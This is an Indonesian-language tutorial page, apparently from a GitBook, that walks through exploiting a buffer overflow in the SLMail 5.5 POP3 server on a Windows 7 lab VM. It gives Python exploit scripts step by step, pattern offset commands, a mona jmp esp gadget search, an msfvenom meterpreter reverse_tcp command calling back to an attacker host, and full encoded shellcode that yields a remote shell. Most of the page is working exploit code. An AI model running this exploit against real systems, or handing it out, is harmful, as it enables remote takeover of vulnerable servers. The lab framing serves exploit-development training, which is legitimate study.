Powered by GitBook

Agar komputer host aman dari berbagai malware, gunakanlah VMWare atau VirtualBox untuk latihan ini.

Unduh OVF Windows 7 di situs resmi MicroSoft.

Sebelumnya install terlebih dahulu

Google Chrome via Internet Explorer
Immunity Debugger
SLMail 5.5

Ujicoba buffer overflow dengan buffer A*2700.

#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A'*2700
try:
        print "\nSending evil buffer..."
        s.connect(('192.168.119.150',110))
        data = s.recv(1024)
        print data
        s.send('USER test' + '\r\n')
        data = s.recv(1024)
        print data
        s.send('PASS ' + buffer + 'test\r\n')
        print "\nDone!"
except:
        print "Could not connect to POP3!"

Program SLMail mengalami crash pada buffer 0x41414141.

Aktifkan VM Kali Linux dan gunakan pattern_create.rb untuk membuat payload.

# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700 > /tmp/pattern

Coba lagi!

#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = open('/tmp/pattern','r').read()
try:
        print "\nSending evil buffer..."
        s.connect(('192.168.119.150',110))
        data = s.recv(1024)
        print data
        s.send('USER test' + '\r\n')
        data = s.recv(1024)
        print data
        s.send('PASS ' + buffer + 'test\r\n')
        print "\nDone!"
except:
        print "Could not connect to POP3!"

Hasilnya, program SLMail 5.5 crash pada EIP 39694438.

Restart Windows VM, ulangi lagi.

Carilah offset agar bisa menimpa register EIP dengan tepat.

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
[*] Exact match at offset 2606

Offset sudah ditemukan pada buffer ke 2606 sehingga tinggal menambahkan 4 buffer B untuk memastikan register EIP tertimpa buffer tersebut.

#!/usr/bin/python

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A"*2606+"BBBB"+"C"*(2700-2606-4)
try:
        print "\nSending evil buffer..."
        s.connect(('192.168.119.150',110))
        data = s.recv(1024)
        print data
        s.send('USER test' + '\r\n')
        data = s.recv(1024)
        print data
        s.send('PASS ' + buffer + 'test\r\n')
        print "\nDone!"
except:
        print "Could not connect to POP3!"

Hasilnya sesuai ekspektasi.

Restart Windows VM, ulangi lagi.

Cari dll SLMail 5.5 yang vulnerable.

!mona modules

Hasilnya, slmfc.dll vulnerable.

Cari gadget jmp esp pada slmfc.dll.

!mona find -s "\xff\xe4" -s slmfc.dll

Hasilnya, 0x5f4a358f bisa digunakan sebagai gadget.

Uji coba dengan gadget:

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "B"*16
try:
        print "\nSending evil buffer..."
        s.connect(('192.168.119.150',110))
        data = s.recv(1024)
        s.send('USER username\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        s.close()
        print "\nDone!"
except:
        print "Could not connect to POP3!"

Tekan Ctrl+G masukkan alamat gadget.

Tekan F2 untuk menandai breakpoint.

Ketika exploit dijalankan, maka program akan menuju breakpoint tersebut. Ditandai dengan nilai EIP sama dengan alamat gadget.

Generate shellcode agar exploit bisa spawning shell.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.147 LPORT=443 -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Ujicoba exploit dengan shellcode:

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buf =  ""
buf += "\xbf\xa2\xa4\x91\xa4\xd9\xcf\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x54\x31\x78\x13\x03\x78\x13\x83\xc0\xa6\x46"
buf += "\x64\x58\x4e\x04\x87\xa1\x8e\x69\x01\x44\xbf\xa9\x75"
buf += "\x0c\xef\x19\xfd\x40\x03\xd1\x53\x71\x90\x97\x7b\x76"
buf += "\x11\x1d\x5a\xb9\xa2\x0e\x9e\xd8\x20\x4d\xf3\x3a\x19"
buf += "\x9e\x06\x3a\x5e\xc3\xeb\x6e\x37\x8f\x5e\x9f\x3c\xc5"
buf += "\x62\x14\x0e\xcb\xe2\xc9\xc6\xea\xc3\x5f\x5d\xb5\xc3"
buf += "\x5e\xb2\xcd\x4d\x79\xd7\xe8\x04\xf2\x23\x86\x96\xd2"
buf += "\x7a\x67\x34\x1b\xb3\x9a\x44\x5b\x73\x45\x33\x95\x80"
buf += "\xf8\x44\x62\xfb\x26\xc0\x71\x5b\xac\x72\x5e\x5a\x61"
buf += "\xe4\x15\x50\xce\x62\x71\x74\xd1\xa7\x09\x80\x5a\x46"
buf += "\xde\x01\x18\x6d\xfa\x4a\xfa\x0c\x5b\x36\xad\x31\xbb"
buf += "\x99\x12\x94\xb7\x37\x46\xa5\x95\x5f\xab\x84\x25\x9f"
buf += "\xa3\x9f\x56\xad\x6c\x34\xf1\x9d\xe5\x92\x06\xe2\xdf"
buf += "\x63\x98\x1d\xe0\x93\xb0\xd9\xb4\xc3\xaa\xc8\xb4\x8f"
buf += "\x2a\xf5\x60\x25\x21\x61\x4b\x12\x42\xe2\x23\x61\xad"
buf += "\x05\x0f\xec\x4b\x55\x3f\xbf\xc3\x15\xef\x7f\xb4\xfd"
buf += "\xe5\x8f\xeb\x1d\x06\x5a\x84\xb7\xe9\x33\xfc\x2f\x93"
buf += "\x19\x76\xce\x5c\xb4\xf2\xd0\xd7\x3d\x02\x9e\x1f\x37"
buf += "\x10\xf6\x41\xb7\xe8\x06\xe8\xb7\x82\x02\xba\xe0\x3a"
buf += "\x08\x9b\xc7\xe4\xf3\xce\x5b\xe2\x0b\x8f\x6d\x98\x3d"
buf += "\x05\xd2\xf6\x41\xc9\xd2\x06\x17\x83\xd2\x6e\xcf\xf7"
buf += "\x80\x8b\x10\x22\xb5\x07\x84\xcd\xec\xf4\x0f\xa6\x12"
buf += "\x22\x67\x69\xec\x01\xf4\x6e\x12\xd7\xd8\xd6\x7b\x27"
buf += "\x5c\xe7\x7b\x4d\x5c\xb7\x13\x9a\x73\x38\xd4\x63\x5e"
buf += "\x11\x7c\xe9\x0e\xd3\x1d\xee\x1b\xb5\x83\xef\xaf\x6e"
buf += "\xd5\x61\x50\x91\xda\x83\x6d\x47\xe3\xf1\xb6\x5b\x50"
buf += "\x09\x8d\xfe\xf1\x80\xed\xad\x02\x81"
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90"*16 + buf
try:
        print "\nSending evil buffer..."
        s.connect(('192.168.119.150',110))
        data = s.recv(1024)
        s.send('USER username\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        s.close()
        print "\nDone!"
except:
        print "Could not connect to POP3!"

Pasang listener pada msfconsole:

Jalankan exploit:

Hasilnya, shell berhasil spawn.

results matching ""

No results matching ""